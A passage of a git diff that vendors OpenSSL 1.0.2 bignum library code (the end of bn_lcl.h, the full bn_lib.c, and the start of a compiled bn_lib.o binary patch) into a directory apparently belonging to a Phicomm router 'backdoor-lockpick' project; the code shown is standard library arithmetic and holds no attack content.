+        l=(l+m)&BN_MASK2; if (l < m) h++; \
+        (lo)=l; \
+        (ho)=h; \
+        }
+
+#  define mul_add(r,a,bl,bh,c) { \
+        BN_ULONG l,h; \
+ \
+        h= (a); \
+        l=LBITS(h); \
+        h=HBITS(h); \
+        mul64(l,h,(bl),(bh)); \
+ \
+        /* non-multiply part */ \
+        l=(l+(c))&BN_MASK2; if (l < (c)) h++; \
+        (c)=(r); \
+        l=(l+(c))&BN_MASK2; if (l < (c)) h++; \
+        (c)=h&BN_MASK2; \
+        (r)=l; \
+        }
+
+#  define mul(r,a,bl,bh,c) { \
+        BN_ULONG l,h; \
+ \
+        h= (a); \
+        l=LBITS(h); \
+        h=HBITS(h); \
+        mul64(l,h,(bl),(bh)); \
+ \
+        /* non-multiply part */ \
+        l+=(c); if ((l&BN_MASK2) < (c)) h++; \
+        (c)=h&BN_MASK2; \
+        (r)=l&BN_MASK2; \
+        }
+# endif                         /* !BN_LLONG */
+
+# if defined(OPENSSL_DOING_MAKEDEPEND) && defined(OPENSSL_FIPS)
+#  undef bn_div_words
+# endif
+
+void bn_mul_normal(BN_ULONG *r, BN_ULONG *a, int na, BN_ULONG *b, int nb);
+void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b);
+void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b);
+void bn_sqr_normal(BN_ULONG *r, const BN_ULONG *a, int n, BN_ULONG *tmp);
+void bn_sqr_comba8(BN_ULONG *r, const BN_ULONG *a);
+void bn_sqr_comba4(BN_ULONG *r, const BN_ULONG *a);
+int bn_cmp_words(const BN_ULONG *a, const BN_ULONG *b, int n);
+int bn_cmp_part_words(const BN_ULONG *a, const BN_ULONG *b, int cl, int dl);
+void bn_mul_recursive(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n2,
+                      int dna, int dnb, BN_ULONG *t);
+void bn_mul_part_recursive(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b,
+                           int n, int tna, int tnb, BN_ULONG *t);
+void bn_sqr_recursive(BN_ULONG *r, const BN_ULONG *a, int n2, BN_ULONG *t);
+void bn_mul_low_normal(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n);
+void bn_mul_low_recursive(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n2,
+                          BN_ULONG *t);
+void bn_mul_high(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, BN_ULONG *l, int n2,
+                 BN_ULONG *t);
+BN_ULONG bn_add_part_words(BN_ULONG *r, const BN_ULONG *a, const BN_ULONG *b,
+                           int cl, int dl);
+BN_ULONG bn_sub_part_words(BN_ULONG *r, const BN_ULONG *a, const BN_ULONG *b,
+                           int cl, int dl);
+int bn_mul_mont(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,
+                const BN_ULONG *np, const BN_ULONG *n0, int num);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_lib.c
new file mode 100644
index 0000000..80105ff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_lib.c
@@ -0,0 +1,916 @@
+/* crypto/bn/bn_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef BN_DEBUG
+# undef NDEBUG                  /* avoid conflicting definitions */
+# define NDEBUG
+#endif
+
+#include <assert.h>
+#include <limits.h>
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+const char BN_version[] = "Big Number" OPENSSL_VERSION_PTEXT;
+
+/* This stuff appears to be completely unused, so is deprecated */
+#ifndef OPENSSL_NO_DEPRECATED
+/*-
+ * For a 32 bit machine
+ * 2 -   4 ==  128
+ * 3 -   8 ==  256
+ * 4 -  16 ==  512
+ * 5 -  32 == 1024
+ * 6 -  64 == 2048
+ * 7 - 128 == 4096
+ * 8 - 256 == 8192
+ */
+static int bn_limit_bits = 0;
+static int bn_limit_num = 8;    /* (1<<bn_limit_bits) */
+static int bn_limit_bits_low = 0;
+static int bn_limit_num_low = 8; /* (1<<bn_limit_bits_low) */
+static int bn_limit_bits_high = 0;
+static int bn_limit_num_high = 8; /* (1<<bn_limit_bits_high) */
+static int bn_limit_bits_mont = 0;
+static int bn_limit_num_mont = 8; /* (1<<bn_limit_bits_mont) */
+
+void BN_set_params(int mult, int high, int low, int mont)
+{
+    if (mult >= 0) {
+        if (mult > (int)(sizeof(int) * 8) - 1)
+            mult = sizeof(int) * 8 - 1;
+        bn_limit_bits = mult;
+        bn_limit_num = 1 << mult;
+    }
+    if (high >= 0) {
+        if (high > (int)(sizeof(int) * 8) - 1)
+            high = sizeof(int) * 8 - 1;
+        bn_limit_bits_high = high;
+        bn_limit_num_high = 1 << high;
+    }
+    if (low >= 0) {
+        if (low > (int)(sizeof(int) * 8) - 1)
+            low = sizeof(int) * 8 - 1;
+        bn_limit_bits_low = low;
+        bn_limit_num_low = 1 << low;
+    }
+    if (mont >= 0) {
+        if (mont > (int)(sizeof(int) * 8) - 1)
+            mont = sizeof(int) * 8 - 1;
+        bn_limit_bits_mont = mont;
+        bn_limit_num_mont = 1 << mont;
+    }
+}
+
+int BN_get_params(int which)
+{
+    if (which == 0)
+        return (bn_limit_bits);
+    else if (which == 1)
+        return (bn_limit_bits_high);
+    else if (which == 2)
+        return (bn_limit_bits_low);
+    else if (which == 3)
+        return (bn_limit_bits_mont);
+    else
+        return (0);
+}
+#endif
+
+const BIGNUM *BN_value_one(void)
+{
+    static const BN_ULONG data_one = 1L;
+    static const BIGNUM const_one =
+        { (BN_ULONG *)&data_one, 1, 1, 0, BN_FLG_STATIC_DATA };
+
+    return (&const_one);
+}
+
+int BN_num_bits_word(BN_ULONG l)
+{
+    static const unsigned char bits[256] = {
+        0, 1, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 4, 4,
+        5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5,
+        6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6,
+        6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6,
+        7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7,
+        7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7,
+        7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7,
+        7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7,
+        8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8,
+        8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8,
+        8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8,
+        8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8,
+        8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8,
+        8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8,
+        8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8,
+        8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8,
+    };
+
+#if defined(SIXTY_FOUR_BIT_LONG)
+    if (l & 0xffffffff00000000L) {
+        if (l & 0xffff000000000000L) {
+            if (l & 0xff00000000000000L) {
+                return (bits[(int)(l >> 56)] + 56);
+            } else
+                return (bits[(int)(l >> 48)] + 48);
+        } else {
+            if (l & 0x0000ff0000000000L) {
+                return (bits[(int)(l >> 40)] + 40);
+            } else
+                return (bits[(int)(l >> 32)] + 32);
+        }
+    } else
+#else
+# ifdef SIXTY_FOUR_BIT
+    if (l & 0xffffffff00000000LL) {
+        if (l & 0xffff000000000000LL) {
+            if (l & 0xff00000000000000LL) {
+                return (bits[(int)(l >> 56)] + 56);
+            } else
+                return (bits[(int)(l >> 48)] + 48);
+        } else {
+            if (l & 0x0000ff0000000000LL) {
+                return (bits[(int)(l >> 40)] + 40);
+            } else
+                return (bits[(int)(l >> 32)] + 32);
+        }
+    } else
+# endif
+#endif
+    {
+#if defined(THIRTY_TWO_BIT) || defined(SIXTY_FOUR_BIT) || defined(SIXTY_FOUR_BIT_LONG)
+        if (l & 0xffff0000L) {
+            if (l & 0xff000000L)
+                return (bits[(int)(l >> 24L)] + 24);
+            else
+                return (bits[(int)(l >> 16L)] + 16);
+        } else
+#endif
+        {
+#if defined(THIRTY_TWO_BIT) || defined(SIXTY_FOUR_BIT) || defined(SIXTY_FOUR_BIT_LONG)
+            if (l & 0xff00L)
+                return (bits[(int)(l >> 8)] + 8);
+            else
+#endif
+                return (bits[(int)(l)]);
+        }
+    }
+}
+
+int BN_num_bits(const BIGNUM *a)
+{
+    int i = a->top - 1;
+    bn_check_top(a);
+
+    if (BN_is_zero(a))
+        return 0;
+    return ((i * BN_BITS2) + BN_num_bits_word(a->d[i]));
+}
+
+void BN_clear_free(BIGNUM *a)
+{
+    int i;
+
+    if (a == NULL)
+        return;
+    bn_check_top(a);
+    if (a->d != NULL) {
+        OPENSSL_cleanse(a->d, a->dmax * sizeof(a->d[0]));
+        if (!(BN_get_flags(a, BN_FLG_STATIC_DATA)))
+            OPENSSL_free(a->d);
+    }
+    i = BN_get_flags(a, BN_FLG_MALLOCED);
+    OPENSSL_cleanse(a, sizeof(BIGNUM));
+    if (i)
+        OPENSSL_free(a);
+}
+
+void BN_free(BIGNUM *a)
+{
+    if (a == NULL)
+        return;
+    bn_check_top(a);
+    if ((a->d != NULL) && !(BN_get_flags(a, BN_FLG_STATIC_DATA)))
+        OPENSSL_free(a->d);
+    if (a->flags & BN_FLG_MALLOCED)
+        OPENSSL_free(a);
+    else {
+#ifndef OPENSSL_NO_DEPRECATED
+        a->flags |= BN_FLG_FREE;
+#endif
+        a->d = NULL;
+    }
+}
+
+void BN_init(BIGNUM *a)
+{
+    memset(a, 0, sizeof(BIGNUM));
+    bn_check_top(a);
+}
+
+BIGNUM *BN_new(void)
+{
+    BIGNUM *ret;
+
+    if ((ret = (BIGNUM *)OPENSSL_malloc(sizeof(BIGNUM))) == NULL) {
+        BNerr(BN_F_BN_NEW, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    ret->flags = BN_FLG_MALLOCED;
+    ret->top = 0;
+    ret->neg = 0;
+    ret->dmax = 0;
+    ret->d = NULL;
+    bn_check_top(ret);
+    return (ret);
+}
+
+/* This is used both by bn_expand2() and bn_dup_expand() */
+/* The caller MUST check that words > b->dmax before calling this */
+static BN_ULONG *bn_expand_internal(const BIGNUM *b, int words)
+{
+    BN_ULONG *A, *a = NULL;
+    const BN_ULONG *B;
+    int i;
+
+    bn_check_top(b);
+
+    if (words > (INT_MAX / (4 * BN_BITS2))) {
+        BNerr(BN_F_BN_EXPAND_INTERNAL, BN_R_BIGNUM_TOO_LONG);
+        return NULL;
+    }
+    if (BN_get_flags(b, BN_FLG_STATIC_DATA)) {
+        BNerr(BN_F_BN_EXPAND_INTERNAL, BN_R_EXPAND_ON_STATIC_BIGNUM_DATA);
+        return (NULL);
+    }
+    a = A = (BN_ULONG *)OPENSSL_malloc(sizeof(BN_ULONG) * words);
+    if (A == NULL) {
+        BNerr(BN_F_BN_EXPAND_INTERNAL, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+#ifdef PURIFY
+    /*
+     * Valgrind complains in BN_consttime_swap because we process the whole
+     * array even if it's not initialised yet. This doesn't matter in that
+     * function - what's important is constant time operation (we're not
+     * actually going to use the data)
+     */
+    memset(a, 0, sizeof(BN_ULONG) * words);
+#endif
+
+#if 1
+    B = b->d;
+    /* Check if the previous number needs to be copied */
+    if (B != NULL) {
+        for (i = b->top >> 2; i > 0; i--, A += 4, B += 4) {
+            /*
+             * The fact that the loop is unrolled
+             * 4-wise is a tribute to Intel. It's
+             * the one that doesn't have enough
+             * registers to accomodate more data.
+             * I'd unroll it 8-wise otherwise:-)
+             *
+             *              <appro@fy.chalmers.se>
+             */
+            BN_ULONG a0, a1, a2, a3;
+            a0 = B[0];
+            a1 = B[1];
+            a2 = B[2];
+            a3 = B[3];
+            A[0] = a0;
+            A[1] = a1;
+            A[2] = a2;
+            A[3] = a3;
+        }
+        /*
+         * workaround for ultrix cc: without 'case 0', the optimizer does
+         * the switch table by doing a=top&3; a--; goto jump_table[a];
+         * which fails for top== 0
+         */
+        switch (b->top & 3) {
+        case 3:
+            A[2] = B[2];
+        case 2:
+            A[1] = B[1];
+        case 1:
+            A[0] = B[0];
+        case 0:
+            ;
+        }
+    }
+#else
+    memset(A, 0, sizeof(BN_ULONG) * words);
+    memcpy(A, b->d, sizeof(b->d[0]) * b->top);
+#endif
+
+    return (a);
+}
+
+/*
+ * This is an internal function that can be used instead of bn_expand2() when
+ * there is a need to copy BIGNUMs instead of only expanding the data part,
+ * while still expanding them. Especially useful when needing to expand
+ * BIGNUMs that are declared 'const' and should therefore not be changed. The
+ * reason to use this instead of a BN_dup() followed by a bn_expand2() is
+ * memory allocation overhead.  A BN_dup() followed by a bn_expand2() will
+ * allocate new memory for the BIGNUM data twice, and free it once, while
+ * bn_dup_expand() makes sure allocation is made only once.
+ */
+
+#ifndef OPENSSL_NO_DEPRECATED
+BIGNUM *bn_dup_expand(const BIGNUM *b, int words)
+{
+    BIGNUM *r = NULL;
+
+    bn_check_top(b);
+
+    /*
+     * This function does not work if words <= b->dmax && top < words because
+     * BN_dup() does not preserve 'dmax'! (But bn_dup_expand() is not used
+     * anywhere yet.)
+     */
+
+    if (words > b->dmax) {
+        BN_ULONG *a = bn_expand_internal(b, words);
+
+        if (a) {
+            r = BN_new();
+            if (r) {
+                r->top = b->top;
+                r->dmax = words;
+                r->neg = b->neg;
+                r->d = a;
+            } else {
+                /* r == NULL, BN_new failure */
+                OPENSSL_free(a);
+            }
+        }
+        /*
+         * If a == NULL, there was an error in allocation in
+         * bn_expand_internal(), and NULL should be returned
+         */
+    } else {
+        r = BN_dup(b);
+    }
+
+    bn_check_top(r);
+    return r;
+}
+#endif
+
+/*
+ * This is an internal function that should not be used in applications. It
+ * ensures that 'b' has enough room for a 'words' word number and initialises
+ * any unused part of b->d with leading zeros. It is mostly used by the
+ * various BIGNUM routines. If there is an error, NULL is returned. If not,
+ * 'b' is returned.
+ */
+
+BIGNUM *bn_expand2(BIGNUM *b, int words)
+{
+    bn_check_top(b);
+
+    if (words > b->dmax) {
+        BN_ULONG *a = bn_expand_internal(b, words);
+        if (!a)
+            return NULL;
+        if (b->d)
+            OPENSSL_free(b->d);
+        b->d = a;
+        b->dmax = words;
+    }
+
+/* None of this should be necessary because of what b->top means! */
+#if 0
+    /*
+     * NB: bn_wexpand() calls this only if the BIGNUM really has to grow
+     */
+    if (b->top < b->dmax) {
+        int i;
+        BN_ULONG *A = &(b->d[b->top]);
+        for (i = (b->dmax - b->top) >> 3; i > 0; i--, A += 8) {
+            A[0] = 0;
+            A[1] = 0;
+            A[2] = 0;
+            A[3] = 0;
+            A[4] = 0;
+            A[5] = 0;
+            A[6] = 0;
+            A[7] = 0;
+        }
+        for (i = (b->dmax - b->top) & 7; i > 0; i--, A++)
+            A[0] = 0;
+        assert(A == &(b->d[b->dmax]));
+    }
+#endif
+    bn_check_top(b);
+    return b;
+}
+
+BIGNUM *BN_dup(const BIGNUM *a)
+{
+    BIGNUM *t;
+
+    if (a == NULL)
+        return NULL;
+    bn_check_top(a);
+
+    t = BN_new();
+    if (t == NULL)
+        return NULL;
+    if (!BN_copy(t, a)) {
+        BN_free(t);
+        return NULL;
+    }
+    bn_check_top(t);
+    return t;
+}
+
+BIGNUM *BN_copy(BIGNUM *a, const BIGNUM *b)
+{
+    int i;
+    BN_ULONG *A;
+    const BN_ULONG *B;
+
+    bn_check_top(b);
+
+    if (a == b)
+        return (a);
+    if (bn_wexpand(a, b->top) == NULL)
+        return (NULL);
+
+#if 1
+    A = a->d;
+    B = b->d;
+    for (i = b->top >> 2; i > 0; i--, A += 4, B += 4) {
+        BN_ULONG a0, a1, a2, a3;
+        a0 = B[0];
+        a1 = B[1];
+        a2 = B[2];
+        a3 = B[3];
+        A[0] = a0;
+        A[1] = a1;
+        A[2] = a2;
+        A[3] = a3;
+    }
+    /* ultrix cc workaround, see comments in bn_expand_internal */
+    switch (b->top & 3) {
+    case 3:
+        A[2] = B[2];
+    case 2:
+        A[1] = B[1];
+    case 1:
+        A[0] = B[0];
+    case 0:;
+    }
+#else
+    memcpy(a->d, b->d, sizeof(b->d[0]) * b->top);
+#endif
+
+    a->top = b->top;
+    a->neg = b->neg;
+    bn_check_top(a);
+    return (a);
+}
+
+void BN_swap(BIGNUM *a, BIGNUM *b)
+{
+    int flags_old_a, flags_old_b;
+    BN_ULONG *tmp_d;
+    int tmp_top, tmp_dmax, tmp_neg;
+
+    bn_check_top(a);
+    bn_check_top(b);
+
+    flags_old_a = a->flags;
+    flags_old_b = b->flags;
+
+    tmp_d = a->d;
+    tmp_top = a->top;
+    tmp_dmax = a->dmax;
+    tmp_neg = a->neg;
+
+    a->d = b->d;
+    a->top = b->top;
+    a->dmax = b->dmax;
+    a->neg = b->neg;
+
+    b->d = tmp_d;
+    b->top = tmp_top;
+    b->dmax = tmp_dmax;
+    b->neg = tmp_neg;
+
+    a->flags =
+        (flags_old_a & BN_FLG_MALLOCED) | (flags_old_b & BN_FLG_STATIC_DATA);
+    b->flags =
+        (flags_old_b & BN_FLG_MALLOCED) | (flags_old_a & BN_FLG_STATIC_DATA);
+    bn_check_top(a);
+    bn_check_top(b);
+}
+
+void BN_clear(BIGNUM *a)
+{
+    bn_check_top(a);
+    if (a->d != NULL)
+        memset(a->d, 0, a->dmax * sizeof(a->d[0]));
+    a->top = 0;
+    a->neg = 0;
+}
+
+BN_ULONG BN_get_word(const BIGNUM *a)
+{
+    if (a->top > 1)
+        return BN_MASK2;
+    else if (a->top == 1)
+        return a->d[0];
+    /* a->top == 0 */
+    return 0;
+}
+
+int BN_set_word(BIGNUM *a, BN_ULONG w)
+{
+    bn_check_top(a);
+    if (bn_expand(a, (int)sizeof(BN_ULONG) * 8) == NULL)
+        return (0);
+    a->neg = 0;
+    a->d[0] = w;
+    a->top = (w ? 1 : 0);
+    bn_check_top(a);
+    return (1);
+}
+
+BIGNUM *BN_bin2bn(const unsigned char *s, int len, BIGNUM *ret)
+{
+    unsigned int i, m;
+    unsigned int n;
+    BN_ULONG l;
+    BIGNUM *bn = NULL;
+
+    if (ret == NULL)
+        ret = bn = BN_new();
+    if (ret == NULL)
+        return (NULL);
+    bn_check_top(ret);
+    l = 0;
+    n = len;
+    if (n == 0) {
+        ret->top = 0;
+        return (ret);
+    }
+    i = ((n - 1) / BN_BYTES) + 1;
+    m = ((n - 1) % (BN_BYTES));
+    if (bn_wexpand(ret, (int)i) == NULL) {
+        if (bn)
+            BN_free(bn);
+        return NULL;
+    }
+    ret->top = i;
+    ret->neg = 0;
+    while (n--) {
+        l = (l << 8L) | *(s++);
+        if (m-- == 0) {
+            ret->d[--i] = l;
+            l = 0;
+            m = BN_BYTES - 1;
+        }
+    }
+    /*
+     * need to call this due to clear byte at top if avoiding having the top
+     * bit set (-ve number)
+     */
+    bn_correct_top(ret);
+    return (ret);
+}
+
+/* ignore negative */
+int BN_bn2bin(const BIGNUM *a, unsigned char *to)
+{
+    int n, i;
+    BN_ULONG l;
+
+    bn_check_top(a);
+    n = i = BN_num_bytes(a);
+    while (i--) {
+        l = a->d[i / BN_BYTES];
+        *(to++) = (unsigned char)(l >> (8 * (i % BN_BYTES))) & 0xff;
+    }
+    return (n);
+}
+
+int BN_ucmp(const BIGNUM *a, const BIGNUM *b)
+{
+    int i;
+    BN_ULONG t1, t2, *ap, *bp;
+
+    bn_check_top(a);
+    bn_check_top(b);
+
+    i = a->top - b->top;
+    if (i != 0)
+        return (i);
+    ap = a->d;
+    bp = b->d;
+    for (i = a->top - 1; i >= 0; i--) {
+        t1 = ap[i];
+        t2 = bp[i];
+        if (t1 != t2)
+            return ((t1 > t2) ? 1 : -1);
+    }
+    return (0);
+}
+
+int BN_cmp(const BIGNUM *a, const BIGNUM *b)
+{
+    int i;
+    int gt, lt;
+    BN_ULONG t1, t2;
+
+    if ((a == NULL) || (b == NULL)) {
+        if (a != NULL)
+            return (-1);
+        else if (b != NULL)
+            return (1);
+        else
+            return (0);
+    }
+
+    bn_check_top(a);
+    bn_check_top(b);
+
+    if (a->neg != b->neg) {
+        if (a->neg)
+            return (-1);
+        else
+            return (1);
+    }
+    if (a->neg == 0) {
+        gt = 1;
+        lt = -1;
+    } else {
+        gt = -1;
+        lt = 1;
+    }
+
+    if (a->top > b->top)
+        return (gt);
+    if (a->top < b->top)
+        return (lt);
+    for (i = a->top - 1; i >= 0; i--) {
+        t1 = a->d[i];
+        t2 = b->d[i];
+        if (t1 > t2)
+            return (gt);
+        if (t1 < t2)
+            return (lt);
+    }
+    return (0);
+}
+
+int BN_set_bit(BIGNUM *a, int n)
+{
+    int i, j, k;
+
+    if (n < 0)
+        return 0;
+
+    i = n / BN_BITS2;
+    j = n % BN_BITS2;
+    if (a->top <= i) {
+        if (bn_wexpand(a, i + 1) == NULL)
+            return (0);
+        for (k = a->top; k < i + 1; k++)
+            a->d[k] = 0;
+        a->top = i + 1;
+    }
+
+    a->d[i] |= (((BN_ULONG)1) << j);
+    bn_check_top(a);
+    return (1);
+}
+
+int BN_clear_bit(BIGNUM *a, int n)
+{
+    int i, j;
+
+    bn_check_top(a);
+    if (n < 0)
+        return 0;
+
+    i = n / BN_BITS2;
+    j = n % BN_BITS2;
+    if (a->top <= i)
+        return (0);
+
+    a->d[i] &= (~(((BN_ULONG)1) << j));
+    bn_correct_top(a);
+    return (1);
+}
+
+int BN_is_bit_set(const BIGNUM *a, int n)
+{
+    int i, j;
+
+    bn_check_top(a);
+    if (n < 0)
+        return 0;
+    i = n / BN_BITS2;
+    j = n % BN_BITS2;
+    if (a->top <= i)
+        return 0;
+    return (int)(((a->d[i]) >> j) & ((BN_ULONG)1));
+}
+
+int BN_mask_bits(BIGNUM *a, int n)
+{
+    int b, w;
+
+    bn_check_top(a);
+    if (n < 0)
+        return 0;
+
+    w = n / BN_BITS2;
+    b = n % BN_BITS2;
+    if (w >= a->top)
+        return 0;
+    if (b == 0)
+        a->top = w;
+    else {
+        a->top = w + 1;
+        a->d[w] &= ~(BN_MASK2 << b);
+    }
+    bn_correct_top(a);
+    return (1);
+}
+
+void BN_set_negative(BIGNUM *a, int b)
+{
+    if (b && !BN_is_zero(a))
+        a->neg = 1;
+    else
+        a->neg = 0;
+}
+
+int bn_cmp_words(const BN_ULONG *a, const BN_ULONG *b, int n)
+{
+    int i;
+    BN_ULONG aa, bb;
+
+    aa = a[n - 1];
+    bb = b[n - 1];
+    if (aa != bb)
+        return ((aa > bb) ? 1 : -1);
+    for (i = n - 2; i >= 0; i--) {
+        aa = a[i];
+        bb = b[i];
+        if (aa != bb)
+            return ((aa > bb) ? 1 : -1);
+    }
+    return (0);
+}
+
+/*
+ * Here follows a specialised variants of bn_cmp_words().  It has the
+ * property of performing the operation on arrays of different sizes. The
+ * sizes of those arrays is expressed through cl, which is the common length
+ * ( basicall, min(len(a),len(b)) ), and dl, which is the delta between the
+ * two lengths, calculated as len(a)-len(b). All lengths are the number of
+ * BN_ULONGs...
+ */
+
+int bn_cmp_part_words(const BN_ULONG *a, const BN_ULONG *b, int cl, int dl)
+{
+    int n, i;
+    n = cl - 1;
+
+    if (dl < 0) {
+        for (i = dl; i < 0; i++) {
+            if (b[n - i] != 0)
+                return -1;      /* a < b */
+        }
+    }
+    if (dl > 0) {
+        for (i = dl; i > 0; i--) {
+            if (a[n + i] != 0)
+                return 1;       /* a > b */
+        }
+    }
+    return bn_cmp_words(a, b, cl);
+}
+
+/*
+ * Constant-time conditional swap of a and b.
+ * a and b are swapped if condition is not 0.  The code assumes that at most one bit of condition is set.
+ * nwords is the number of words to swap.  The code assumes that at least nwords are allocated in both a and b,
+ * and that no more than nwords are used by either a or b.
+ * a and b cannot be the same number
+ */
+void BN_consttime_swap(BN_ULONG condition, BIGNUM *a, BIGNUM *b, int nwords)
+{
+    BN_ULONG t;
+    int i;
+
+    bn_wcheck_size(a, nwords);
+    bn_wcheck_size(b, nwords);
+
+    assert(a != b);
+    assert((condition & (condition - 1)) == 0);
+    assert(sizeof(BN_ULONG) >= sizeof(int));
+
+    condition = ((condition - 1) >> (BN_BITS2 - 1)) - 1;
+
+    t = (a->top ^ b->top) & condition;
+    a->top ^= t;
+    b->top ^= t;
+
+#define BN_CONSTTIME_SWAP(ind) \
+        do { \
+                t = (a->d[ind] ^ b->d[ind]) & condition; \
+                a->d[ind] ^= t; \
+                b->d[ind] ^= t; \
+        } while (0)
+
+    switch (nwords) {
+    default:
+        for (i = 10; i < nwords; i++)
+            BN_CONSTTIME_SWAP(i);
+        /* Fallthrough */
+    case 10:
+        BN_CONSTTIME_SWAP(9);   /* Fallthrough */
+    case 9:
+        BN_CONSTTIME_SWAP(8);   /* Fallthrough */
+    case 8:
+        BN_CONSTTIME_SWAP(7);   /* Fallthrough */
+    case 7:
+        BN_CONSTTIME_SWAP(6);   /* Fallthrough */
+    case 6:
+        BN_CONSTTIME_SWAP(5);   /* Fallthrough */
+    case 5:
+        BN_CONSTTIME_SWAP(4);   /* Fallthrough */
+    case 4:
+        BN_CONSTTIME_SWAP(3);   /* Fallthrough */
+    case 3:
+        BN_CONSTTIME_SWAP(2);   /* Fallthrough */
+    case 2:
+        BN_CONSTTIME_SWAP(1);   /* Fallthrough */
+    case 1:
+        BN_CONSTTIME_SWAP(0);
+    }
+#undef BN_CONSTTIME_SWAP
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..44674f0e2d08c2ab4a17e569605d1a910dafc88c
GIT binary patch
literal 9760
zcmc(leQ;FQb->^53h4pzY601nY86&Bag-WwwKBG)ni@T6S6tE62Z%58wMb%(HP)A<
zw+K=!?0GEX+viQ3nIwZ}`iG}!CZ0C!bS9|>Gp)Ugu)gX9frFi|rh>Q*uqNO*1|cVY
zJ?Fl2rN;|y{>Wr{XLjGczkBYv_nmvry=OH#9E~-2Jsw3CkMfu@-;z{OUM`=n*NSSb
zvQ$~3Xq(zLJol+(9ae@5qv1?=;=};-=9V%3$@O)`UcKCgT>xJ{0AFwT;42z_?;<>u
